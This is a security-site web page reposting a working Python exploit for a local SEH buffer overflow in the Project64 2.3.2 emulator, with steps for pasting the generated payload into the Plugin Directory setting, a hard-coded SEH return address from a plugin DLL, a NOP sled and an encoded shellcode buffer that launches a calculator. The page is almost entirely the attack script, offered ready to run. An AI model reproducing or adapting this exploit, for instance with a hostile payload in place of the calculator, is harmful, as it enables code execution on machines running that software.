首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Project64 2.3.2 - Buffer Overflow (SEH) 来源：@Pwsecspirit 作者：Singh 发布时间：2018-08-27   # Exploit Title: Project64 2.3.2 - Local BufferOverflow (SEH) # Date: 2018-08-21 # Author: Shubham Singh # Known As: Spirited Wolf [Twitter: @Pwsecspirit] # Software Link:https://www.pj64-emu.com/download/project64-latest # Tested Version: 2.3.2 # Tested on OS: Windows XP Service Pack 3 x86 , Windows 7 ultimate x86   # Steps to Reproduce: # 1. Run the python exploit script, it will create a new file with the name "exploit.txt". # 2. Just copy the text inside "exploit.txt". # 3. Start the program. In the new window click "Options" > "Settings" > "Directories". # 4. Now paste the content of "exploit.txt" into the field:"Plugin Directory" and make sure it is selected. Click "Apply" > "Ok" # You will see a sweet calculator poped up. # Greetz: @hexachordanu @FuzzySec @LiveOverflow   junk = "A" * 380 nseh = "\xEB\x06\x90\x90" #0x10096609 : pop ebx # pop eax # ret  | ascii {PAGE_EXECUTE_READWRITE} [Jabo_Direct3D8.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.7.0.57-ver5 (C:\Program Files\Project64 2.3\Plugin\GFX\Jabo_Direct3D8.dll) seh = "\x09\x66\x09\x10" nops = "\x90" * 18 #badchar \x00\x0a\x0d\x2f buf =  "" buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29" buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a" buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b" buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c" buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a" buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9" buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21" buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08" buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85" buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75" buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64" buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5" buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16" buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e" buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92" buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88" buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b" pad = "B" * (700 - len(nseh) -len(seh) - len(junk) -len(nops) - len(buf))   payload = junk + nseh +seh + nops + buf + pad   exploit = payload try:     f=open("exploit.txt","w")     print "[+] Creating %s bytes evil payload.." %len(exploit)     f.write(exploit)     f.close()     print "[+] File created!" except:     print "File cannot be created"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·OpenSSH 7.7 - Username Enumera ·KingMedia 4.1 - Remote Code Ex ·Hikvision IP Camera 5.4.0 - Us ·Textpad 7.6.4 - Denial Of Serv ·Project64 2.3.2 - Denial Of Se ·UltraISO 9.7.1.3519 - Denial O ·Easylogin Pro 1.3.0 - 'Encrypt ·Easyboot 6.6.0 - Denial Of Ser ·Prime95 29.4b7 - Denial Of Ser ·Softdisk 3.0.3 - Denial Of Ser ·Restorator 1793 - Denial of Se ·CuteFTP 8.3.1 - Denial of Serv   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved